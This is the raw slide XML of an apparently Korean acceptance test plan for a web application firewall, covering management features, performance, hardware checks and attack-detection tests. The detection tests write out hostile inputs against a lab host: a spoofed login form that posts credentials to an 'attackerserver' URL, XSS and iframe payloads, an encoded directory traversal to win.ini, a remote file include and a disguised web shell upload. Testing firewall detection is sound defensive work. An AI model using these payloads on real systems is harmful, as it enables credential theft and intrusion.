                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
                        <a:t>지원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2540345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HTTP/2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프로토콜 탐지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차단 기능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033328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관리도구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인증서 등록 추가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9144568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3,24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모니터링 기능   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397524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Active-standby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이중화 구성 환경에서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LLCF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기능 제공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0180969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 Termination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기능 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935883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Active-Active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이중화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구성 환경에서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Cross failover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기능 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8610730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WebSocket </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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프로토콜 기반 탐지 여부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0160117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TOR </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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네트워크 차단 기능 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764086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Secure Response Headers : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="8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(X-Frame-Options, X-XSS-Protection, X-Content-Type-Options)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="800" b="1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7397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535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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>관리기능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084009AF-F9FE-4AC0-9170-D1A6A979C5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44000"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="2110740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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분류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시험번호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항목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관리기능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SSL Cipher suite </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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외의 접속 시 차단 페이지 제공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6243917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관리기능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3.32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Session Key </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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검색 기능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3.33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GUI Customization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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기능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3.34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보고서 포맷 설정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85623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j-ea"/>
                        </a:rPr>
                        <a:t>3.35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en-US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리소스 파일 업데이트 기능 제공 </a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="700" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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4149096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3.36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kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mj-ea"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>감사로그 메모 강제 설정 기능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3236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630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시험 항목</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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CA6006AE-7FF0-4A7D-B079-DD542C155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>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>성능</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea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6" name="Group 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D31ABD0-986A-4253-80F3-078D778E0A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09579"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="611188" y="1412875"/>
          <a:ext cx="8175625" cy="2110740"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="725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6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95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6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분류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시험번호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평가 항목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시험 </a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="0" lang="en-US" altLang="ko-KR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결과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91438" marR="9143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06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750">
                <a:tc row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성능</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91438" marR="9143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 1024byte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CPS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 1024byte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TPS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 32Kbyte Throughput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9570268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HTTPS 1024byte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CPS</a:t>
                      </a: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HTTPS 1024byte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TPS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4.6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HTTPS 32Kbyte Throughput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38" marR="91438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8" marR="9143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0780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5083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0C6E2D4E-2C2C-4795-8A81-7D2C00846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312152"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5666566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1.1 CPU : [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제안한 장비의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Core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수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]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요구 조건에 부합하는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CPU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정보를 확인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CLI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에서 확인 가능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360363" marR="0" lvl="1" indent="-1841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CPU core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수 확인 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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vtysh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pentasec@penta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:(</a:t>
                      </a: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wapples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)# command </a:t>
                      </a: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mpstat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-P ALL</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="360363" marR="0" lvl="1" indent="-1841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-280987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GUI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에서 확인 가능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57200" marR="0" lvl="1" indent="-280987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환경설정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시스템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정보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1307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BF227263-8623-4023-A490-69CE3898D9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807545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1.2 Memory : [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제안한 장비의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Memory Size]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요구 조건에 부합하는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Memory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정보를 확인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CLI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에서 확인 가능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free + cache size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확인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pentasec@penta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:(</a:t>
                      </a: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wapples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)# command </a:t>
                      </a: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vmstat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1 1</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="685800" marR="0" lvl="1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GUI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에서 확인 가능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환경설정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시스템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정보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695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CCD2BE1A-7817-43AD-BD1D-4BA6178E0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C8618522-5433-4FB5-B0AA-B04F2078F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738019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시험번호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1.3 HDD : [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제안한 장비의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HDD Size]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시험내용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요구 조건에 부합하는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HDD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정보를 확인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CLI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에서 확인 가능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11163" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="8969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Filesystem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확인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pentasec@penta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:(</a:t>
                      </a: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wapples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)# command </a:t>
                      </a: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df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–h</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="411163" marR="0" lvl="1" indent="-228600" algn="l" defTabSz="8969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-274637" algn="l" defTabSz="8969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GUI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에서 확인 가능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57200" marR="0" lvl="1" indent="-274637" algn="l" defTabSz="896938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</a:pP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대시보드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시스템 현황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디스크 확인 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737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DE9E4F41-9B47-499C-A029-95725C35A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6733E3F9-6D20-4C91-9C1F-6E040731B2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758348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1.4 Network Interface : [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제안한 장비의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NIC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조합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]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요구 조건에 부합하는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Network Interface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가 장착되었는지 확인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176213" marR="0" lvl="0" indent="-176213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CLI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에서 확인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1) network interface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전체 확인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628650" marR="0" lvl="1" indent="-17145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pentasec@penta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# pretzel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pentasec@penta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:(.pretzel)# show port all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3149CB6F-F568-49B3-A08F-113AD1B215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73"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1952625"/>
            <a:ext cx="2543530" cy="406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5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DE9E4F41-9B47-499C-A029-95725C35A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2B6CCB7C-98BA-45C4-B83D-265C499CA9EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="956032"/>
            <a:ext cx="8395200" cy="5484368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="18000" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-2520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Font typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
              <a:defRPr sz="20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04000" indent="-2520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defRPr sz="18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56000" indent="-2286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arenR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008000" indent="-2286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Font typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr sz="14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206000" indent="-1800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lphaLcPeriod"/>
              <a:defRPr sz="12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EC4CF76-69B9-4108-BF22-EAD3869652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5360869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1.5 Dual Power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이상 및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Power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상태 체크 기능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요구 조건에 부합하는 전원 정보를 확인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장비 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="ko-KR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뒷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 편 육안 확인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CLI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에서 확인 가능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pentasec@penta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# diagnosis </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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psu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GUI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  <a:t>에서 확인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대시보드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시스템 현황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&gt;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  <a:cs typeface="+mn-cs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6252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DE9E4F41-9B47-499C-A029-95725C35A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2B6CCB7C-98BA-45C4-B83D-265C499CA9EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="956032"/>
            <a:ext cx="8395200" cy="5484368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="18000" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-2520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Font typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
              <a:defRPr sz="20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04000" indent="-2520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defRPr sz="18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56000" indent="-2286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arenR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008000" indent="-2286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Font typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr sz="14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206000" indent="-1800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lphaLcPeriod"/>
              <a:defRPr sz="12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74BCCB61-6516-44FC-B906-BC13675504E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374072" y="956032"/>
            <a:ext cx="8395200" cy="5484368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="18000" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228600" indent="-2520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Tx/>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
              <a:defRPr sz="20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504000" indent="-2520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eriod"/>
              <a:defRPr sz="18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2pPr>
            <a:lvl3pPr marL="756000" indent="-2286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+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
              <a:defRPr sz="16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3pPr>
            <a:lvl4pPr marL="1008000" indent="-2286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Font typeface="+mj-ea"/>
              <a:buAutoNum type="circleNumDbPlain"/>
              <a:defRPr sz="14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4pPr>
            <a:lvl5pPr marL="1206000" indent="-180000" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latin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Font typeface="+mj-lt"/>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:defRPr sz="12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5pPr>
            <a:lvl6pPr marL="0" indent="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8FD1501-19EE-4580-933B-33D420B105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52425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2.1 Buffer Overflow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공격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어플리케이션이 예상하는 값의 크기보다 더 큰 값을 입력하여 어플리케이션의 정상 동작을 방해하거나 임의의 명령을 수행하도록 함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URL/HEADER/KEY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에 의미 없이 반복되는 값 입력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kumimoji="0" lang="ko-KR" altLang="en-US" sz="1000" b="0" i="0" u="sng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브라우저 주소항목에 아래와 같이 입력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탐지여부 확인 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1" name="직사각형 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1D7A049-95F3-458F-8F86-43BEA8C71E6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="272420" y="2214694"/>
            <a:ext cx="4105275" cy="8636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http://192.168.63.246/login.asp?aaaaaaaaaaadskldjaksdjaksjdkasdkjasdkasdkaksdjkasssssssssssssssssssssssssssssfjaksaadasdasdasdasdasdasdfjaskfjaslkfjkasfjlkasjfklsajfkla=11111111111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534422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276045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2.2 Cookie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변조 공격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Cookie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를 변조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획득하여 웹 어플리케이션의 특정 계정에 대한 접근 권한을 취득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브라우저와 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Proxy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툴을 이용하여 진행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1) Proxy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툴 실행 및 설정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2)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브라우저 실행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3)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브라우저 내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Proxy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설정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4)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공격 대상 페이지 접속 및 로그인 시도 진행 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5) Proxy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툴에서 쿠키 값 변경이 후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진행 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6)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탐지여부 확인 </a:t>
                      </a:r>
                      <a:b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</a:b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" name="그림 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC3C2F6-9F69-4B75-8838-4CFCEF06B8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11"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="684674" y="4664364"/>
            <a:ext cx="2945217" cy="1367238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9FCF9A8F-128C-4657-9891-898E06D86A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674" y="2306762"/>
            <a:ext cx="2945217" cy="1391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10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2779730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2.3 Content Spoofing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사용자의 입력을 유도하는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tag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및 공격자의 웹서버로 전송하기 위한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action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을 삽입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임의의 게시판을 통해 공격 시도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공격자는 로그인 폼에서 취약점을 발견한다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id="{B4865202-DA3A-4ED2-AD67-ACD9F8652F88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374073" y="2289670"/>
            <a:ext cx="4007428" cy="201790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1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR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url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사용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- http://192.168.63.246/vulnerable.php?name=%3Ch3%3EPlease%20Enter%20Your%20Username%20and%20Password%20to%20Proceed:%3C/h3%3E%3Cform%20method=%22POST%22%20action=%22http://attackerserver/login.php%22%3EUsername:%20%3Cinput%20type=%22text%22%20name=%22username%22%20/%3E%3Cbr%20/%3EPassword:%20%3Cinput%20type=%22password%22%20name=%22password%22%20/%3E%3Cbr%20/%3E%3Cinput%20type=%22submit%22%20value=%22Login%22%20/%3E%3C/form%3E%3C!--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3222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4475788"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5702600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2.4-1 XSS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공격 및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 XSS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우회 공격 차단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JavaScript, VBScript, Flash, Active X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등과 같이 클라이언트 측에서 실행되는 언어로 작성된 코드가 </a:t>
                      </a:r>
                    </a:p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클라이언트 측 브라우저에서 그대로 수행되는 특성을 이용한 악성 스크립트 공격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브라우저 </a:t>
                      </a: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url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아래와 같은 구문 삽입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직사각형 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96A6B3B8-802C-4151-9D3C-3FA9EC411262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="340928" y="2207850"/>
            <a:ext cx="3945322" cy="85042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atinLnBrk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CASE1) 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http://192.168.63.246/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e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44295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981149"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5702600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2.4-2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XSS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시 태그 무력화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JavaScript, VBScript, Flash, Active X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등과 같이 클라이언트 측에서 실행되는 언어로 작성된 코드가 그대로 </a:t>
                      </a:r>
                    </a:p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클라이언트 측 브라우저에서 그대로 수행되는 특성을 이용한 악성 스크립트 공격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XSS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시 태그 무력화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게시물 작성시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아래와 같은 구문 삽입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 2)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 및 태그 무효화 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489444" y="2288690"/>
            <a:ext cx="3555183" cy="24584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http://192.168.63.246/%3Ciframe%20src=%22http://www.attackerserver.com%22%3E &gt;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026990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474807"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5702600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2.4-3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이미지 태그를 이용한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XSS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및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XSS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우회 공격 차단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JavaScript, VBScript, Flash, Active X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등과 같이 클라이언트 측에서 실행되는 언어로 작성된 코드가 그대로 </a:t>
                      </a:r>
                    </a:p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클라이언트 측 브라우저에서 그대로 수행되는 특성을 이용한 악성 스크립트 공격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indent="-228600" latinLnBrk="1">
                        <a:buFont typeface="+mj-lt"/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이미지 태그 사용한 공격 탐지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게시물 작성시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공격코드를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아래 내용으로 입력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정탐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261769" y="2271912"/>
            <a:ext cx="4098888" cy="3474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http://192.168.63.246/servlet/CookieExample?cookiename=1%3Cimg%20src=xyz%20OnErRor=qEcs(9609)%3E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879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742314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2.5 Directory Listing / Directory Traversal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노출 방지 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서버에서 사용자가 입력한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URL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컨텐츠가 없을 경우 발생하는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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Direcroty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Listing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방지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indent="-228600" latinLnBrk="1">
                        <a:buFont typeface="+mj-lt"/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취약한 웹 서버에 아래와 같이 진행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브라우저 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" u="sng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주소항목에</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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아래와 같이 입력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u="sng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Font typeface="+mj-lt"/>
                        <a:buAutoNum type="arabicPeriod"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" u="sng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Font typeface="+mj-lt"/>
                        <a:buNone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2)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346076" y="2224858"/>
            <a:ext cx="4044950" cy="6616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ttp://192.168.63.246/servlet/CookieExample?cookiename==%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini&amp;bankCd2=023&amp;page=5&amp;searchType=contents&amp;searchWord=the%20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19192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156619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2.6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서버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어플리케이션 에러 노출 방지 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어플리케이션 사용 시 메모리 부족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 DB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접속 오류 등으로 인해 노출될 수 있는 에러 노출 방지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서버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Status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코드에 따른 탐지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47675" lvl="1" indent="-276225" latinLnBrk="1">
                        <a:buAutoNum type="arabicParenR"/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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브라우저 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" u="sng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주소항목에</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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아래와 같이 입력</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" u="sng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47675" lvl="1" indent="-276225" latinLnBrk="1">
                        <a:buAutoNum type="arabicParenR"/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" u="sng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180975" lvl="2" indent="-9525" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct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180975" lvl="2" indent="-9525" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct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180975" lvl="2" indent="-9525" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="1" hangingPunct="1">
                        <a:buNone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‘500 or 404 Error’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확인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3)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252413" y="2228989"/>
            <a:ext cx="4105275" cy="2873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http://192.168.63.246/include/include.php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17478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018952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2.7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서버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어플리케이션 파일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확장자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접근 제한 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서버 내부의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확장자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접근 제한 또는 허용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취약한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확장자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입력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브라우저 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" u="sng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주소항목에</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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아래와 같이 입력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276621" y="2235200"/>
            <a:ext cx="4105275" cy="2873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http://192.168.63.246/aa.bap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77791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090400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2.8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미 허용 파일 및 이미지 파일 위장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웹쉘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업로드 방지</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US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악의적인 사용자가 공격에 사용되는 도구를 업로드 하는 것을 방지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웹셀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업로드 탐지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준비한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웹쉘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파일명을 아래와 같이 변경하여 시도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 확인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직사각형 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="2349500"/>
            <a:ext cx="4105275" cy="2873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파일명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en-US" altLang="ko-KR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daewoo.jsp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24084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9446856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2.9 File Include Injection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서버 내부의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확장자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접근 제한 또는 허용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외부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주소 삽입 시도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브라우저 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" u="sng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주소항목에</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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아래와 같이 입력</a:t>
                      </a:r>
                      <a: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정탐</a:t>
                      </a:r>
                      <a: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직사각형 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="2273300"/>
            <a:ext cx="4105275" cy="2873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http://192.168.63.246/include/include.php?include=http://terms.naver.com/entry.nhn?docId=858169&amp;cid=42346&amp;categoryId=4234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15259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7202164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2.10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비속어 방지를 위한 차단 및 문자열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치환기능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게시판에서 비속어 등의 사용을 방지하기 위해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등록한 단어를 다른 문자열로 변경해주는 기능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게시판에 비속어 등을 입력 하여 확인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방화벽에 비속어 입력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게시판에 위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‘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바보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’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입력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3)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치환여부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250825" y="2301875"/>
            <a:ext cx="4105275" cy="28733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Ex)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비속어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바보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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>치환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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> 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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>천재 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00928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777535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2.11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HTTP RFC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Compliance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검증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자동화 도구나 웜 등을 이용한 정상적인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규격에 맞지 않는 요청 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테스트 툴을 이용하여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RFC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규격에 어긋나는 공격 시도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아래와 같은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CASE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로 입력 시도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위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CASE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별 탐지여부 확인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282700" y="2205875"/>
            <a:ext cx="4105275" cy="26638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CASE1) HTTP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프로토콜 미 명시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GET /index.html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CASE2) Header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선언기준 오류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GET /index.html HTTP/1.1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Host test.com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         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378682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9267997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2.12 HTTP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URL Compliance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검증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RFC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정의된 형식을 벗어난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URL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의 요청 입력 값이 보안장비 우회 목적으로 악의적으로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인코딩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하여 공격 시도 </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="45617" marB="4561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브라우저를 이용하여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RFC URL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규격에 어긋나는 공격 시도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브라우저를 실행하고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주소항목에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아래와 같이 입력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52413" y="2261418"/>
            <a:ext cx="4105275" cy="1295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CASE1) URL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  <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://192.168.63.246/%25%25%25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68625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061295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2.13 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국가 및 사용자 지정 출발지 대역에 차단 기능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특정 국가나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Client IP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에 대한 차단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사용자가 지정한 국가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or IP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대해 차단 진행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방화벽에 위배되는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IP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대해 웹 브라우저를 통해 접근 시도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4148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222930"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5648845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1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2.14 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Hidden Field Manipulation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방지</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="44516" marB="445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775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웹 애플리케이션의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URL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이나 인자를 프로그래머가 원하지 않던 다른 값으로 변조하여 공격하는 기법입니다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.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웹 애플리케이션이 사용자의 입력 값을 적절히 검증하지 않는 경우 예기치 못한 오 동작을 유발하거나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웹 애플리케이션의 보안 메커니즘을 우회할 수 있습니다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.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4516" marB="445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7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4705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password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미 기입된 로그인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아래 코드로 로그인 페이지를 만든 후 로그인 창에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id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만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입력후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최소값을 충족하지 못하도록 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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passwd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란을 공백인 상태 또는 변조했을 때 로그인 시도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25289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918779"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="566696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2.15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개인정보 노출 방지 및 변조</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="44927" marB="449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4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웹 서비스를 통한 개인정보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주민등록번호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카드번호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법인등록번호 등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노출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 시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이에 대응이 가능한지 여부 확인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4927" marB="449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60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3960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게시판을 통해 개인정보 입력 이후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글 보기를 통해 노출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방화벽에 개인정보 설정 및 매칭 건수 설정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 값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: 3)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특정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웹서버의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게시판에 개인정보가 입력된 글을 선택하여 개인정보 노출 여부 확인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3)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설정된 매칭 건 수 만큼 개인정보가 포함된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호출 시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None/>
                      </a:pP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4)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직사각형 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274184" y="2851511"/>
            <a:ext cx="4105275" cy="28008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CASE1)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정탐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표시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주민등록번호 입력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CASE2)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정탐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표시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주민등록번호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3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건 입력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CASE3)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오탐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표시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주민등록번호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2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건 입력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CASE4)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오탐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표시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자릿수만 맞는 주민등록형태 입력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CASE5)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신용카드번호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표시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신용카드 번호 입력 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CASE6)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법인등록번호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표시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법인등록 번호 입력 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CASE7)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은행계좌번호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딜리미터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자리수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탐지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표시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은행계좌 번호 입력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딜리미터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“---”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38384647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904750"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="836613"/>
          <a:ext cx="8474075" cy="5666459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2.16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개인정보 입력 방지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4927" marB="449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웹 서비스를 통한 개인정보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주민등록번호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카드번호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법인등록번호 등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)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입력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 시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이에 대응이 가능한지 여부 확인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4927" marB="4492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9720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게시판을 통해 개인정보 입력 시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대응 확인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방화벽에 개인정보 설정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브라우저를 통해 게시판 접근 및 아래와 같이 개인정보 입력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None/>
                      </a:pP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3)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304092" y="2563003"/>
            <a:ext cx="3930558" cy="286676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CASE1)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정탐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주민등록번호 입력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CASE2)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정탐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주민등록번호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3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건 입력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CASE3)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오탐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주민등록번호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2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건 입력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CASE4)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오탐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자릿수만 맞는 주민등록형태 입력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CASE5)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신용카드번호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신용카드 번호 입력 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CASE6)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법인등록번호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법인등록 번호 입력  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CASE7)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은행계좌번호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딜리미터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자리수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탐지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표시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은행계좌 번호 입력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딜리미터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“---”)</a:t>
            </a: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25521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435730"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="214313" y="832525"/>
          <a:ext cx="8474075" cy="5682575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2.17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개인정보가 포함된 압축파일 다운로드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업로드 방지</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="44275" marB="442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웹 서비스를 통한 개인정보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(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주민등록번호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카드번호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법인등록번호 등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)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가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포함된  파일업로드 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/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다운로드 시 이를 확인하고 대응이 가능한지 여부 확인</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" baseline="0" dirty="0">
                        <a:latin typeface="+mj-ea"/>
                        <a:ea typeface="+mj-ea"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91441" marR="91441" marT="44275" marB="442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게시판을 통해 개인정보 파일 업로드 및 다운로드를 통해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방화벽에 개인정보 설정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아래와 같이 개인정보 파일 생성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3)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Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
                          <a:ea typeface="굴림" charset="-127"/>
                        </a:rPr>
                        <a:t>문서 파일은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Bitstream Vera Sans Mono" pitchFamily="49" charset="0"/>
